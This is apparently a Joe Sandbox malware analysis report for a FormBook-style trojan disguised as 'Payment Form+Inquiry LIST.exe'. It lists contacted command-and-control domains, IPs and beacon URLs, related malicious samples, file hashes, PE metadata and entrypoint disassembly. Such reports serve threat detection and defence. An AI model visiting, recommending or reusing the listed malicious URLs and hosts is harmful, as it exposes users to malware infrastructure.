                		35.241.34.216
                		truefalse
                  		unknown
                  www.cwgehkk.store
                  		43.155.26.241
                  		truetrueunknown
                  shops.myshopify.com
                  		23.227.38.74
                  		truetrueunknown
                  www.lavillitadepapa.com
                  		74.208.46.171
                  		truetrueunknown
                  mybodyradar.net
                  		3.33.130.190
                  		truetrueunknown
                  www.gospelstudygroup.org
                  		unknown
                  		unknowntrueunknown
                  www.amkmos.online
                  		unknown
                  		unknowntrueunknown
                  www.gzlhysuess.com
                  		unknown
                  		unknowntrueunknown
                  www.instantmailer.cloud
                  		unknown
                  		unknowntrueunknown
                  www.kosherphonestore.com
                  		unknown
                  		unknowntrueunknown
                  www.mybodyradar.net
                  		unknown
                  		unknowntrueunknown
                  www.valerieomage.com
                  		unknown
                  		unknowntrueunknown
                  www.mcxright.com
                  		unknown
                  		unknowntrueunknown
                  www.siteblogoficialon.com
                  		unknown
                  		unknowntrueunknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://www.lavillitadepapa.com/i1fz/?mZytyNB=69+72+ftTFcgCPV1pfBGcRAhZJTRakO2Kh+ZkvubWnSJrIurKkpNo2aBygpvSICGeoPjDFn9pekXwSuquQeAgXbnoNXGqYnuCVvRNE6ZSnCvZlL6jw==&54D0m=gvohHHH0true
                  • Avira URL Cloud: malware
                  		unknown
                  http://www.valerieomage.com/c7rq/?mZytyNB=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl+OFvVeu4EU857dyc7w4+qhgXRMO7PTzi/X2HMMMtdNC+wv2+swaARuNAxDjOzMu+VfqP1kNqiiXC0Ug==&54D0m=gvohHHH0true
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.mg55aa.xyz/7npk/false
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.siteblogoficialon.com/xti2/true
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.csstoneoak.com/gtrt/?54D0m=gvohHHH0&mZytyNB=CHU0G0yFQmM3m9FspjIn2OXZQ8PvFb3qq8K3IggeoLnhuD5d4WydmEsCdQRuIbszuu3RpEHjTi2Q+otudHtA+7uFI7xmMJNqmwR/uOZtT1hR+XqCuA==true
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.lacemalt.top/tb8p/true
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.kosherphonestore.com/ktbm/true
                    		unknown
                    http://www.mybodyradar.net/nml2/true
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.cwgehkk.store/kwl6/true
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.lacemalt.top/tb8p/?54D0m=gvohHHH0&mZytyNB=qOKUC29yX8oZAlbJDfcpCLzpMPZC9WFwxrZXgt1GanD4ODtcEeVG6I3ogONv/wZG3CcBcKt2BHXhpUQRSUiIsaScbSWFF5V9pamWb9U32+hQ7ii7xg==true
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.kosherphonestore.com/ktbm/?mZytyNB=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkjiz3Hv37r9oCCf0bTqtzy4xv37G1SgXOWwK4/O35gX3K6ytzmMUh+twkmzSQ==&54D0m=gvohHHH0true
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.siteblogoficialon.com/xti2/?mZytyNB=QBz94yBRYCLuyG0lRWVoJ262XBKS6lrDLuuKlraC8+h4eo3ZkplyB9kY6zupybd5FXB5boaSfX9kd7InJ4l2pFGuXFTeP1snGKodOakbcCZ5ieg/dQ==&54D0m=gvohHHH0true
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.lavillitadepapa.com/i1fz/true
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.cwgehkk.store/kwl6/?54D0m=gvohHHH0&mZytyNB=a60HvCvUhLiFhuUSc8WrKARCzXFsQAvffUZBz2uIU9nHYJX4NGLIPasF9EYqD4O1NmBy69LXG4mImYvzxGn1EucVb48mJLaeeXAyU/wxkvnKBCdexA==true
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.csstoneoak.com/gtrt/true
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.mg55aa.xyz/7npk/?54D0m=gvohHHH0&mZytyNB=3lhlChS8FYnXqyMl6DrMwk16pFUOD90SHj/DecBTIjGSaQxy34ZC87B+/wA+Ty9En/TQ2WIUU2NJwAlG0p0MY4r+pCVils+sXQjgc19rp6lijR1H1Q==false
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://duckduckgo.com/chrome_newtabfindstr.exe, 00000007.00000002.3794278730.0000000007B28000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://download.quark.cn/download/quarkpc?platform=android&ch=pcquarkfindstr.exe, 00000007.00000002.3792132594.0000000004A18000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.0000000004668000.00000004.00000001.00040000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.jsfindstr.exe, 00000007.00000002.3792132594.0000000004A18000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.0000000004668000.00000004.00000001.00040000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/ac/?q=findstr.exe, 00000007.00000002.3794278730.0000000007B28000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.jsfindstr.exe, 00000007.00000002.3792132594.0000000004A18000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.0000000004668000.00000004.00000001.00040000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://aka.ms/nativeaot-cPayment Form+Inquiry LIST.exefalse
                      		unknown
                      https://www.lavillitadepapa.com/i1fz/?mZytyNB=69QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.00000000047FA000.00000004.00000001.00040000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      https://valerieomage.com/c7rq?mZytyNB=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstlfindstr.exe, 00000007.00000002.3792132594.0000000003BF6000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.0000000003846000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1922034773.000000002FC86000.00000004.80000000.00040000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://aka.ms/nativeaot-compatibilityyPayment Form+Inquiry LIST.exefalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://aka.ms/nativeaot-compatibility8d8Payment Form+Inquiry LIST.exe, 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.csstoneoak.comQYzBgoBGBcxProZWs.exe, 00000009.00000002.3793025669.0000000005756000.00000040.80000000.00040000.00000000.sdmpfalse
                        		unknown
                        https://track.uc.cn/collectfindstr.exe, 00000007.00000002.3792132594.0000000004A18000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.0000000004668000.00000004.00000001.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=findstr.exe, 00000007.00000002.3794278730.0000000007B28000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=findstr.exe, 00000007.00000002.3794278730.0000000007B28000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://www.ecosia.org/newtab/findstr.exe, 00000007.00000002.3794278730.0000000007B28000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.jsfindstr.exe, 00000007.00000002.3792132594.0000000004A18000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.0000000004668000.00000004.00000001.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://ac.ecosia.org/autocomplete?q=findstr.exe, 00000007.00000002.3794278730.0000000007B28000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://hm.baidu.com/hm.js?findstr.exe, 00000007.00000002.3792132594.0000000004A18000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.0000000004668000.00000004.00000001.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://aka.ms/nativeaot-compatibilityPayment Form+Inquiry LIST.exefalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfindstr.exe, 00000007.00000002.3794278730.0000000007B28000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://aka.ms/nativeaot-compatibilityYPayment Form+Inquiry LIST.exefalse
                          		unknown
                          https://www.etmt194.com/s1/yurjyyyafindstr.exe, 00000007.00000002.3794084439.0000000005FA0000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3792132594.0000000004D3C000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.000000000498C000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.jsfindstr.exe, 00000007.00000002.3792132594.0000000004A18000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.0000000004668000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://aka.ms/GlobalizationInvariantModePayment Form+Inquiry LIST.exefalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.kosherphonestore.com/ktbm/?mZytyNB=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtfindstr.exe, 00000007.00000002.3792132594.0000000003F1A000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.0000000003B6A000.00000004.00000001.00040000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=findstr.exe, 00000007.00000002.3794278730.0000000007B28000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.cssfindstr.exe, 00000007.00000002.3792132594.0000000004A18000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.0000000004668000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.siteblogoficialon.com/xti2/?mZytyNB=QBz94yBRYCLuyG0lRWVoJ262XBKS6lrDLuuKlraC8findstr.exe, 00000007.00000002.3792132594.0000000004562000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.00000000041B2000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          43.155.26.241
                          		www.cwgehkk.storeJapan4249LILLY-ASUStrue
                          203.161.55.102
                          		www.lacemalt.topMalaysia
                          		45899VNPT-AS-VNVNPTCorpVNtrue
                          108.179.193.98
                          		siteblogoficialon.comUnited States
                          		46606UNIFIEDLAYER-AS-1UStrue
                          74.208.46.171
                          		www.lavillitadepapa.comUnited States
                          		8560ONEANDONE-ASBrauerstrasse48DEtrue
                          23.227.38.74
                          		shops.myshopify.comCanada
                          		13335CLOUDFLARENETUStrue
                          154.92.52.196
                          		www.csstoneoak.comSeychelles
                          		132839POWERLINE-AS-APPOWERLINEDATACENTERHKtrue
                          84.32.84.101
                          		www.kosherphonestore.com.cdn.hstgr.netLithuania
                          		33922NTT-LT-ASLTtrue
                          3.33.130.190
                          		mybodyradar.netUnited States
                          		8987AMAZONEXPANSIONGBtrue
                          35.241.34.216
                          		www.mg55aa.xyzUnited States
                          		15169GOOGLEUSfalse

                          General Information

                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1475677
                          Start date and time:2024-07-18 08:14:21 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 10m 9s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:12
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:2
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:Payment Form+Inquiry LIST.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@8/1@14/9
                          EGA Information:
                          • Successful, ratio: 75%
                          HCA Information:
                          • Successful, ratio: 67%
                          • Number of executed functions: 75
                          • Number of non-executed functions: 300
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report creation exceeded maximum time and may have missing disassembly code information.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          02:16:13API Interceptor10330704x Sleep call for process: findstr.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          43.155.26.241GJRX21GBj3.exeGet hashmaliciousFormBookBrowse
                          • www.cwgehkk.store/kwl6/
                          Shipping documents.bat.exeGet hashmaliciousFormBookBrowse
                          • www.cwgehkk.store/9fu0/
                          shipping_doc.bat.exeGet hashmaliciousFormBookBrowse
                          • www.cwgehkk.store/9fu0/
                          SHIPPING_DOCUMENTS.exeGet hashmaliciousFormBookBrowse
                          • www.cwgehkk.store/9fu0/
                          SHIPPING_DOCS.bat.exeGet hashmaliciousFormBookBrowse
                          • www.cwgehkk.store/9fu0/
                          Maersk_Quotation034865374.exeGet hashmaliciousFormBookBrowse
                          • www.cwgehkk.store/9fu0/
                          203.161.55.102PTT Group project - Quotation.exeGet hashmaliciousFormBookBrowse
                          • www.lexiecos.top/ff8d/
                          RFQ - MK FMHS.RFQ.24.101.exeGet hashmaliciousFormBookBrowse
                          • www.lexiecos.top/ff8d/
                          GJRX21GBj3.exeGet hashmaliciousFormBookBrowse
                          • www.lacemalt.top/tb8p/
                          Request for Quotation for PTTEP - EPCC for SISGES Development Project 2.exeGet hashmaliciousFormBookBrowse
                          • www.lexiecos.top/ff8d/
                          Materials specification with quantities.exeGet hashmaliciousFormBookBrowse
                          • www.lexiecos.top/ff8d/
                          Request for Quotation - (SM Store San Mateo).exeGet hashmaliciousFormBookBrowse
                          • www.lexiecos.top/ff8d/
                          PTT request form.exeGet hashmaliciousFormBookBrowse
                          • www.bodfun.online/wbp0/
                          Request for Quotation - e092876.exeGet hashmaliciousFormBookBrowse
                          • www.lexiecos.top/ff8d/
                          PTT requested quotation.exeGet hashmaliciousFormBookBrowse
                          • www.bodfun.online/wbp0/
                          RFQ - 5002172340000.exeGet hashmaliciousFormBookBrowse
                          • www.lexiecos.top/ff8d/

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          www.kosherphonestore.com.cdn.hstgr.netNew Order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                          • 84.32.84.195
                          BL.exeGet hashmaliciousFormBookBrowse
                          • 154.41.249.52
                          payment advice.exeGet hashmaliciousFormBookBrowse
                          • 84.32.84.196
                          MV SHUHA QUEEN II.exeGet hashmaliciousFormBookBrowse
                          • 77.37.53.17
                          AuT5pFGTFw.exeGet hashmaliciousFormBookBrowse
                          • 84.32.84.159
                          new order.exeGet hashmaliciousFormBookBrowse
                          • 149.100.144.167
                          GJRX21GBj3.exeGet hashmaliciousFormBookBrowse
                          • 84.32.84.130
                          nJ8mJTmMf0.exeGet hashmaliciousFormBookBrowse
                          • 84.32.84.112
                          DHL Arrival Notice.exeGet hashmaliciousFormBookBrowse
                          • 154.62.106.34
                          Shipping Documents.pdf.exeGet hashmaliciousFormBookBrowse
                          • 77.37.53.194
                          www.csstoneoak.comSecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.16736.4797.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                          • 154.92.52.196
                          IMG_00110724.exeGet hashmaliciousFormBookBrowse
                          • 154.92.52.196
                          SecuriteInfo.com.Win32.PWSX-gen.17883.22231.exeGet hashmaliciousFormBookBrowse
                          • 154.92.52.196
                          Shipping Documents.exeGet hashmaliciousFormBookBrowse
                          • 154.92.52.196
                          Shipping Documents.exeGet hashmaliciousFormBookBrowse
                          • 154.92.52.196
                          Shipping Documents.exeGet hashmaliciousFormBookBrowse
                          • 154.92.52.196
                          IMG______6122024.exeGet hashmaliciousFormBookBrowse
                          • 154.92.52.196
                          PO14624.exeGet hashmaliciousFormBookBrowse
                          • 154.92.52.196
                          IMG___001.exeGet hashmaliciousFormBookBrowse
                          • 154.92.52.196
                          IMG__001.exeGet hashmaliciousFormBookBrowse
                          • 154.92.52.196
                          www.lacemalt.topGJRX21GBj3.exeGet hashmaliciousFormBookBrowse
                          • 203.161.55.102

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          ONEANDONE-ASBrauerstrasse48DENEW RFQ - Viasat LSDR.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                          • 217.76.156.252
                          https://inusualinteriorismo.com/my/new1/fe8ed05153643d81e452383bf8118ca5/cc.php/Get hashmaliciousUnknownBrowse
                          • 217.160.0.106
                          PO-9412-23007-EPCM_CONSUMABLE_PT.exeGet hashmaliciousFormBookBrowse
                          • 74.208.236.182
                          https://imis.conbio.org/iMIS/iCommerce/HLLoginRedirect.aspx?CheckOnly=True&Redirect=https://eofa.pages.dev/?email=QWxqb3NoYS5Cb2xsaW5nZXJAZm1zLWxvZ2lzdGljcy5jb20=Get hashmaliciousUnknownBrowse
                          • 217.76.130.192
                          SHIPMENT-CMA CGM-1DBSIE1P-DOCX.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                          • 212.227.172.253
                          e-transac- RP062024 Nominal-PPI2452246 20240712NISPIDJA010O0100000503.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                          • 74.208.236.247
                          5CxmQXL0LD.exeGet hashmaliciousSystemBCBrowse
                          • 213.171.216.50
                          SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeGet hashmaliciousFormBookBrowse
                          • 212.227.172.254
                          GSTP - K3E0035.exeGet hashmaliciousFormBookBrowse
                          • 213.171.195.105
                          SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.16736.4797.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                          • 217.160.230.215
                          LILLY-ASUShttp://internet-explorer.amic-group.com/Get hashmaliciousUnknownBrowse
                          • 43.154.222.231
                          ToDeskApp_HYI.x64.msiGet hashmaliciousUnknownBrowse
                          • 43.152.26.151
                          ToDeskApp_HYI.x64.msiGet hashmaliciousUnknownBrowse
                          • 43.152.44.86
                          MicrosoftInst.exeGet hashmaliciousUnknownBrowse
                          • 43.132.105.108
                          MicrosoftInst.exeGet hashmaliciousGhostRatBrowse
                          • 43.132.105.108
                          x86.elfGet hashmaliciousMiraiBrowse
                          • 40.178.219.83
                          arm.elfGet hashmaliciousMiraiBrowse
                          • 40.234.147.194
                          botx.arm6.elfGet hashmaliciousMiraiBrowse
                          • 43.38.167.24
                          botx.mips.elfGet hashmaliciousMiraiBrowse
                          • 43.95.114.51
                          93.123.85.50-mips-2024-07-17T09_21_42.elfGet hashmaliciousMiraiBrowse
                          • 40.62.102.144
                          VNPT-AS-VNVNPTCorpVNrASoAfQNeEF5VDs.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                          • 203.161.41.204
                          http://www.pineappledigitalai.agencyGet hashmaliciousUnknownBrowse
                          • 203.161.62.56
                          arm.elfGet hashmaliciousMiraiBrowse
                          • 113.176.108.46
                          Vyuhx7175I.elfGet hashmaliciousMiraiBrowse
                          • 113.178.80.87
                          yHIoCL9LQV.elfGet hashmaliciousMiraiBrowse
                          • 113.189.220.144
                          botx.mpsl.elfGet hashmaliciousMiraiBrowse
                          • 14.250.22.46
                          botx.x86.elfGet hashmaliciousMiraiBrowse
                          • 14.239.136.25
                          PEDIDO DE COMPRA URGENTEs#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousFormBookBrowse
                          • 203.161.49.220
                          file.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                          • 203.161.43.228
                          PEDIDO DE COMPRA URGENTEs#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousFormBookBrowse
                          • 203.161.49.220
                          UNIFIEDLAYER-AS-1USBSX#24001602.exeGet hashmaliciousAzorult, GuLoaderBrowse
                          • 108.167.181.251
                          NEW RFQ - Viasat LSDR.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                          • 162.241.253.174
                          http://umw.qhd.mybluehost.me/Dhlast/billing.phpGet hashmaliciousUnknownBrowse
                          • 162.241.216.197
                          https://rb.gy/g52lv5Get hashmaliciousHTMLPhisherBrowse
                          • 69.49.241.24
                          1PqEIBZ2Ki.jsGet hashmaliciousUnknownBrowse
                          • 162.241.252.230
                          https://www.linkomanija.net/redir.php?url=https://contavisual.com/zxzxxcx/Get hashmaliciousUnknownBrowse
                          • 192.185.93.208
                          https://link.mail.beehiiv.com/ls/click?upn=u001.E5t9nwiEOPNvgobT-2BLaXeMhYdk9-2BQdwTj2CsMF2n8QMzkCwf5eGWjlurhQzQLU3cnXpNS5x1E1KS2g5AulN68rpCnkV5GfBtbF8n-2FDYBaEJ0WLmIDPEKmp7aArClqydUCFbVdqfaE3etu-2FRZX7mzQCCWWVwr6PVJYhdZHmD-2FXlO1R7OTmBD5NXPBXdy81FvE9XFQ_kaZbegZM04h14TrhJ-2FVOzqhv2Vmod0DMeh3Yk9TPE2TN0J9eS6m9v-2BigFT7IzuUCWzV-2FX9OVvQ2jwwWP8HM5Z6-2F-2BsRgPIgedDW7InO8xOpCQaw1ZWg2ZK8vJgl9LAAJUKvfB-2FgPHZ4omB3crMTZ8i-2FuNYERjO8v97VxCs6mhGUInTunkUBk-2FyuL9x3ccmLJR-2FRRD9JS141Vpmf8AIMJI7q27vU7FXpiYZU8XG8R97uaZVDMrui4lvoonrJJnsuAxfoyR1q-2FWaxjDp4p91jikRpcfhEyyFe7j3My-2F7m1CvG8Gt97aJZt7qIb-2ByPJ4bBX4lDN4QQ-2F7T5M7FC64Hl9uwS59ch1dNR1SrKnkeLq-2FGsfsw8IcDkaz90PjrTMayL0eFtPuDUm7dySNB-2FAr-2BCK0RRpxgyv60MFOWTZnK-2BkI6HjZuo-2FkT7aNAcnJH372lO4l#michael_dunder@office.comGet hashmaliciousHTMLPhisherBrowse
                          • 69.49.245.172
                          http://www.ded-cafe.ae/cgi-sys/bxd.cgi?a=anoud.hassan@ded-cafe.ae&id=WeWzGXbqxcwWWbP_9JB7e-1721128638Get hashmaliciousUnknownBrowse
                          • 173.254.30.236
                          New Order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                          • 162.241.253.174
                          RS0987656789000JHGH.exeGet hashmaliciousAgentTeslaBrowse
                          • 162.241.62.63

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Temp\H0840I45

                          Download File
                          Process:C:\Windows\SysWOW64\findstr.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                          Category:dropped
                          Size (bytes):196608
                          Entropy (8bit):1.1221538113908904
                          Encrypted:false
                          SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
                          MD5:C1AE02DC8BFF5DD65491BF71C0B740A7
                          SHA1:6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
                          SHA-256:CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
                          SHA-512:01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          Static File Info

                          General

                          File type:PE32+ executable (console) x86-64, for MS Windows
                          Entropy (8bit):7.042770064714997
                          TrID:
                          • Win64 Executable Console Net Framework (206006/5) 48.58%
                          • Win64 Executable Console (202006/5) 47.64%
                          • Win64 Executable (generic) (12005/4) 2.83%
                          • Generic Win/DOS Executable (2004/3) 0.47%
                          • DOS Executable Generic (2002/1) 0.47%
                          File name:Payment Form+Inquiry LIST.exe
                          File size:1'950'720 bytes
                          MD5:7f8d840982ad0a6c999a3a35e2bff6c1
                          SHA1:aec4c33c4513d9b7d1a9d01ed5234a060e4a6481
                          SHA256:b7ca9f28528677ff0664ea5968a23f19c454b72c54dcaeca4cc1c3173e6f80bc
                          SHA512:58cd6e8ee762c058abca77dccc3b4dbf8bf994e6598da440bbfc958d12622b2517deb8e31b233d1acee34195aa2c2db20fd50c27777d5feaede10c1e5423bcd8
                          SSDEEP:49152:K01xRoq0SqdSo1s9Z7N/pilLbWQ87oFfXUiUbL1tPGQgvvKceg:0nd9USKcp
                          TLSH:B995BE15E3E802A8E577DB34CA629333CAB1B8561731E58F065CD2452F33EA19B7B315
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{.x...+...+...+b..*...+b..*...+b..*...+.b.+...+.b.*...+...+R..+R..*...+R..*...+...+...+R..*...+...*...+...*...+Rich...+.......

                          File Icon

                          Icon Hash:00928e8e8686b000

                          Static PE Info

                          General

                          Entrypoint:0x140060b80
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x140000000
                          Subsystem:windows cui
                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Time Stamp:0x667341EA [Wed Jun 19 20:39:06 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:6
                          OS Version Minor:0
                          File Version Major:6
                          File Version Minor:0
                          Subsystem Version Major:6
                          Subsystem Version Minor:0
                          Import Hash:06249f041b2cdab25d6c331a97469bef

                          Entrypoint Preview

                          Instruction
                          dec eax
                          sub esp, 28h
                          call 00007FB9307CA93Ch
                          dec eax
                          add esp, 28h
                          jmp 00007FB9307CA187h
                          int3
                          int3
                          jmp 00007FB9307CACC8h
                          int3
                          int3
                          int3
                          dec eax
                          sub esp, 28h
                          dec ebp
                          mov eax, dword ptr [ecx+38h]
                          dec eax
                          mov ecx, edx
                          dec ecx
                          mov edx, ecx
                          call 00007FB9307CA322h
                          mov eax, 00000001h
                          dec eax
                          add esp, 28h
                          ret
                          int3
                          int3
                          int3
                          inc eax
                          push ebx
                          inc ebp
                          mov ebx, dword ptr [eax]
                          dec eax
                          mov ebx, edx
                          inc ecx
                          and ebx, FFFFFFF8h
                          dec esp
                          mov ecx, ecx
                          inc ecx
                          test byte ptr [eax], 00000004h
                          dec esp
                          mov edx, ecx
                          je 00007FB9307CA325h
                          inc ecx
                          mov eax, dword ptr [eax+08h]
                          dec ebp
                          arpl word ptr [eax+04h], dx
                          neg eax
                          dec esp
                          add edx, ecx
                          dec eax
                          arpl ax, cx
                          dec esp
                          and edx, ecx
                          dec ecx
                          arpl bx, ax
                          dec edx
                          mov edx, dword ptr [eax+edx]
                          dec eax
                          mov eax, dword ptr [ebx+10h]
                          mov ecx, dword ptr [eax+08h]
                          dec eax
                          mov eax, dword ptr [ebx+08h]
                          test byte ptr [ecx+eax+03h], 0000000Fh
                          je 00007FB9307CA31Dh
                          movzx eax, byte ptr [ecx+eax+03h]
                          and eax, FFFFFFF0h
                          dec esp
                          add ecx, eax
                          dec esp
                          xor ecx, edx
                          dec ecx
                          mov ecx, ecx
                          pop ebx
                          jmp 00007FB9307CA32Eh
                          int3
                          int3
